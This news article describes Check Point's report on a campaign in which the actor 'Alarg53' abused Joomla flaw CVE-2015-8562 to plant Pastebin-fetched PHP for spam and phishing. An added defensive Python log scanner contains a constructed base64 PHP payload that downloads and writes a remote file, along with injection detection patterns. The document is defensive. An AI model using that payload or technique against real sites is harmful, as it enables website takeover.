- Joomla is believed to still contain an old remote code execution (RCE) flaw in its platform.
- An attacker exploited this flaw, using malicious PHP code to compromise websites and to bypass the CMS’ mail service.
Popular content management system (CMS) Joomla has been hit with new spam campaigns recently. As per a report by Check Point Research, a threat actor who goes by the name ‘Alarg53’ has broken into many Joomla-powered websites by exploiting a security flaw.
The CMS’ mail service, Jmail, was the primary target of the attack. By abusing Jmail, new phishing and spamming infrastructure could easily be set up.
How does it work?
- According to Check Point, the attacker first exploits the old Joomla Object Injection Remote Code Execution (CVE-2015-8562) vulnerability.
- A base64-encoded malicious PHP string is injected into the User-Agent header of HTTP requests.
- This PHP code is decoded and executed on the target system, and then downloads certain files from Pastebin.
- One of the downloaded files overrides Jmail. This file provides functions such as sending emails and uploading files.
- The compromised site then serves as infrastructure the attacker can use for operations such as uploading files, phishing and spamming.
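As an added example that is not part of the Check Point report or this article, the following Python log scanner flags the injection pattern described above: a base64-encoded PHP string, or a serialized PHP object, carried in the User-Agent header of a combined-format web server log. The log lines and the PHP payload are constructed samples, not captured traffic.

```python
import base64
import re

# Constructed combined-format access-log lines (not real traffic): a normal browser,
# a User-Agent carrying base64-encoded PHP, and one carrying a serialized PHP object.
PHP_PAYLOAD = base64.b64encode(
    b'<?php file_put_contents("x.php", file_get_contents("https://pastebin.com/raw/PLACEHOLDER")); ?>'
).decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2019:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/67.0"',
    '198.51.100.7 - - [10/Jun/2019:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "' + PHP_PAYLOAD + '"',
    '198.51.100.9 - - [10/Jun/2019:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "O:6:\\"Gadget\\":1:{s:4:\\"code\\";s:4:\\"test\\";}"',
]

# The User-Agent is the last quoted field; Apache escapes embedded quotes as \" so allow them.
UA_FIELD = re.compile(r'"(?P<ua>(?:[^"\\]|\\.)*)"\s*$')
# Strings that indicate PHP source rather than a browser identifier once the base64 is decoded.
PHP_MARKERS = ("<?php", "eval(", "base64_decode(", "file_get_contents(", "file_put_contents(", "pastebin.com")
# Prefix of a serialized PHP object, e.g. O:6:"Gadget":1:{ ... } (CVE-2015-8562 is an object injection bug).
SERIALIZED_OBJECT = re.compile(r'O:\d+:"[^"]+":\d+:\{')
# A run of base64 alphabet characters long enough to encode something beyond a browser token.
BASE64_RUN = re.compile(r'[A-Za-z0-9+/]{24,}={0,2}')

def user_agent(line):
    """Extract and unescape the User-Agent field of a combined-format log line."""
    m = UA_FIELD.search(line)
    return m.group("ua").replace('\\"', '"') if m else ""

def decoded_base64_runs(ua):
    """Yield the decoded text of every base64-looking run in the User-Agent."""
    for m in BASE64_RUN.finditer(ua):
        chunk = m.group(0)
        try:
            raw = base64.b64decode(chunk + "=" * (-len(chunk) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError: not valid base64, skip it
            continue
        yield raw.decode("utf-8", errors="ignore")

def classify(line):
    """Return the reasons a line looks like a PHP injection attempt (empty list = benign)."""
    ua = user_agent(line)
    reasons = []
    if SERIALIZED_OBJECT.search(ua):
        reasons.append("serialized PHP object in User-Agent")
    for text in decoded_base64_runs(ua):
        hits = [marker for marker in PHP_MARKERS if marker in text]
        if hits:
            reasons.append("base64-encoded PHP in User-Agent: " + ", ".join(hits))
    return reasons

def scan(lines):
    """Map 1-based line numbers to their findings, skipping benign lines."""
    return {n: classify(line) for n, line in enumerate(lines, 1) if classify(line)}
```

Run against a real access log, each line of SAMPLE_LOG would be a line read from the file; a hit on a Joomla host should be followed by checking the session table and the site for unexpected PHP files rather than treated as proof on its own.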
Who is the attacker – Alarg53 has a notable history in the cybercrime space. It is reported that he has hacked more than 15,000 websites in the last few years. His signature move is to deface affected websites with the message ‘Hacked by Alarg53’.
“Two years ago, Alarg53 gained worldwide attention by attacking The Biology of Aging Center at Stanford University’s website. At first, it was thought to be just another ‘Hacked By Alarg53’ attack, but within a few hours, two PHP files were uploaded to the relevant servers enabling them to send large amounts of spam mail,” Check Point researchers wrote.